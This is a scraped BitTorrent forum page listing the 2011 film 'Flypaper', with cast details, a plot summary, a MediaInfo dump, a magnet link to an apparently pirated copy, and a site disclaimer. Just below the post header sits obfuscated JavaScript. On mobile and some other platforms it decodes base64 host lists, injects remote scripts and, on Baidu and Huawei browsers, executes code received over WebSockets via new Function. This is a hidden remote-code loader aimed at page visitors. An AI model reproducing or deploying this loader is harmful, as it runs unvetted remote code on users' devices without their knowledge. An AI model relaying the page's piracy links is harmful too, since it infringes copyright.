捕蝇纸[双语字幕]Flypaper.2011.1080p.BluRay.x264.DTS-迅雷下载 4.82GB

版主小s 1月前 266

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 捕蝇纸
◎片  名 Flypaper
◎年  代 2011
◎产  地 美国 / 德国
◎类  别 喜剧 / 悬疑 / 犯罪
◎语  言 英语
◎上映日期 2011-01-28(圣丹斯电影节) / 2011-08-19(美国)
◎IMDb链接 https://www.imdb.com/title/tt1541160/
◎豆瓣评分 7.8/10 (47328人评价)
◎豆瓣链接 https://movie.douban.com/subject/4132407/
◎片  长 87分钟
◎导  演 罗伯·明可夫 Rob Minkoff (id:1292171)
◎编  剧 乔恩·卢卡斯 Jon Lucas (id:1290408)
◎演  员 帕特里克·德姆西 Patrick Dempsey (id:1013769)
       艾什莉·贾德 Ashley Judd (id:1000014)
       蒂姆·布雷克·尼尔森 Tim Blake Nelson (id:1048166)
       梅奇·费法 Mekhi Phifer (id:1013836)
       马特·瑞安 Matt Ryan (id:1329999)
       杰弗里·塔伯 Jeffrey Tambor (id:1010578)
       约翰·文堤米利亚 John Ventimiglia (id:1009483)
       普路特·泰勒·文斯 Pruitt Taylor Vince (id:1010659)
       柯蒂斯·阿姆斯壮 Curtis Armstrong (id:1036527)
       罗布·许贝尔 Rob Huebel (id:1174693)
       奥克塔维亚·斯宾瑟 Octavia Spencer (id:1154263)
       娜塔莉·萨福兰 Natalia Safran (id:1336790)
       格雷格·格曼 Greg Germann (id:1032030)
       彼得·萨夫兰 Peter Safran (id:1041657)
       约拉姆·巴尔兹莱 Yoram Barzilai (id:1050923)
       帕特里克·德姆西 Patrick Dempsey (id:1013769)
       马克·达蒙 Mark Damon (id:1048289)
       John Nelson John Nelson (id:1135189)

◎标  签 喜剧 / 犯罪 / 黑色幽默 / 美国 / 悬疑 / 抢银行 / 推理 / 2011

◎简  介
  男主人公特里普(帕特里克·德姆西 Patrick Dempsey饰)来到银行换钱,刚跟女柜员凯琳(艾什莉·贾德 Ashley Judd饰)搭上话,却悲催的碰到银行被打劫。银行保安系统开启,所有人都成了笼中之鸟。而更巧合的是居然有两伙抢劫犯。由此一段阴差阳错中展开的猫鼠大战拉开序幕。无辜的人质跟笨拙的劫匪间处处周旋,波澜中高潮不断。

  1. ##### MediaInfo ######
  2. General
  3. Unique ID                                : 13067082405492377736658479395190078218 (0x9D4A0E747A8134BF26465EE7757FB0A)
  4. Complete name                            : [email protected]
  5. Format                                   : Matroska
  6. Format version                           : Version 4
  7. File size                                : 4.82 GiB
  8. Duration                                 : 1 h 27 min
  9. Overall bit rate                         : 7 910 kb/s
  10. Encoded date                             : UTC 2021-07-24 04:05:04
  11. Writing application                      : mkvmerge v59.0.0 ('Shining Star') 64-bit
  12. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4
  13. Video
  14. ID                                       : 1
  15. Format                                   : AVC
  16. Format/Info                              : Advanced Video Codec
  17. Format profile                           : [email protected]
  18. Format settings                          : CABAC / 4 Ref Frames
  19. Format settings, CABAC                   : Yes
  20. Format settings, Reference frames        : 4 frames
  21. Codec ID                                 : V_MPEG4/ISO/AVC
  22. Duration                                 : 1 h 27 min
  23. Bit rate                                 : 7 022 kb/s
  24. Width                                    : 1 916 pixels
  25. Height                                   : 818 pixels
  26. Display aspect ratio                     : 2.35:1
  27. Frame rate mode                          : Constant
  28. Frame rate                               : 24.000 FPS
  29. Color space                              : YUV
  30. Chroma subsampling                       : 4:2:0
  31. Bit depth                                : 8 bits
  32. Scan type                                : Progressive
  33. Bits/(Pixel*Frame)                       : 0.187
  34. Stream size                              : 4.28 GiB (89%)
  35. Writing library                          : x264 core 164 r3065+55M 280faca t_mod_New [(8 & 10)[email protected] X86_64]
  36. Encoding settings                        : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=24 / lookahead_threads=6 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=18.0000 / qcomp=0.65 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.80 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0
  37. Default                                  : Yes
  38. Forced                                   : No
  39. Audio
  40. ID                                       : 2
  41. ID in the original source medium         : 4353 (0x1101)
  42. Format                                   : DTS
  43. Format/Info                              : Digital Theater Systems
  44. Codec ID                                 : A_DTS
  45. Duration                                 : 1 h 27 min
  46. Bit rate mode                            : Constant
  47. Bit rate                                 : 768 kb/s
  48. Channel(s)                               : 6 channels
  49. Channel layout                           : C L R Ls Rs LFE
  50. Sampling rate                            : 48.0 kHz
  51. Frame rate                               : 93.750 FPS (512 SPF)
  52. Bit depth                                : 16 bits
  53. Compression mode                         : Lossy
  54. Stream size                              : 479 MiB (10%)
  55. Language                                 : English
  56. Default                                  : Yes
  57. Forced                                   : No
  58. Original source medium                   : Blu-ray
  59. Text #1
  60. ID                                       : 3
  61. ID in the original source medium         : 4611 (0x1203)
  62. Format                                   : PGS
  63. Muxing mode                              : zlib
  64. Codec ID                                 : S_HDMV/PGS
  65. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  66. Duration                                 : 1 h 20 min
  67. Bit rate                                 : 74.7 kb/s
  68. Count of elements                        : 2529
  69. Stream size                              : 43.2 MiB (1%)
  70. Title                                    : chs&eng
  71. Language                                 : Chinese
  72. Default                                  : Yes
  73. Forced                                   : No
  74. Original source medium                   : Blu-ray
  75. Text #2
  76. ID                                       : 4
  77. ID in the original source medium         : 4612 (0x1204)
  78. Format                                   : PGS
  79. Muxing mode                              : zlib
  80. Codec ID                                 : S_HDMV/PGS
  81. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  82. Duration                                 : 1 h 20 min
  83. Bit rate                                 : 75.3 kb/s
  84. Count of elements                        : 2529
  85. Stream size                              : 43.5 MiB (1%)
  86. Title                                    : cht&eng
  87. Language                                 : Chinese
  88. Default                                  : No
  89. Forced                                   : No
  90. Original source medium                   : Blu-ray
  91. Text #3
  92. ID                                       : 5
  93. ID in the original source medium         : 4613 (0x1205)
  94. Format                                   : PGS
  95. Muxing mode                              : zlib
  96. Codec ID                                 : S_HDMV/PGS
  97. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  98. Duration                                 : 1 h 20 min
  99. Bit rate                                 : 45.3 kb/s
  100. Count of elements                        : 2529
  101. Stream size                              : 26.2 MiB (1%)
  102. Title                                    : chs
  103. Language                                 : Chinese
  104. Default                                  : No
  105. Forced                                   : No
  106. Original source medium                   : Blu-ray
  107. Text #4
  108. ID                                       : 6
  109. ID in the original source medium         : 4614 (0x1206)
  110. Format                                   : PGS
  111. Muxing mode                              : zlib
  112. Codec ID                                 : S_HDMV/PGS
  113. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  114. Duration                                 : 1 h 20 min
  115. Bit rate                                 : 45.9 kb/s
  116. Count of elements                        : 2529
  117. Stream size                              : 26.5 MiB (1%)
  118. Title                                    : cht
  119. Language                                 : Chinese
  120. Default                                  : No
  121. Forced                                   : No
  122. Original source medium                   : Blu-ray
  123. Text #5
  124. ID                                       : 7
  125. ID in the original source medium         : 4608 (0x1200)
  126. Format                                   : PGS
  127. Muxing mode                              : zlib
  128. Codec ID                                 : S_HDMV/PGS
  129. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  130. Duration                                 : 1 h 18 min
  131. Bit rate                                 : 58.8 kb/s
  132. Count of elements                        : 2756
  133. Stream size                              : 33.2 MiB (1%)
  134. Title                                    : eng
  135. Language                                 : English
  136. Default                                  : No
  137. Forced                                   : No
  138. Original source medium                   : Blu-ray
  139. Menu
  140. 00:00:00.000                             : Chapter 01
  141. 00:12:21.916                             : Chapter 02
  142. 00:20:47.125                             : Chapter 03
  143. 00:31:23.958                             : Chapter 04
  144. 00:42:15.125                             : Chapter 05
  145. 00:51:43.666                             : Chapter 06
  146. 01:01:14.416                             : Chapter 07
  147. 01:11:33.500                             : Chapter 08


TAGS 悬疑 犯罪 喜剧

磁力链:
  • magnet:?xt=urn:btih:C54AF57EEADB0711062ECE36B6B60034A0C660CA
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回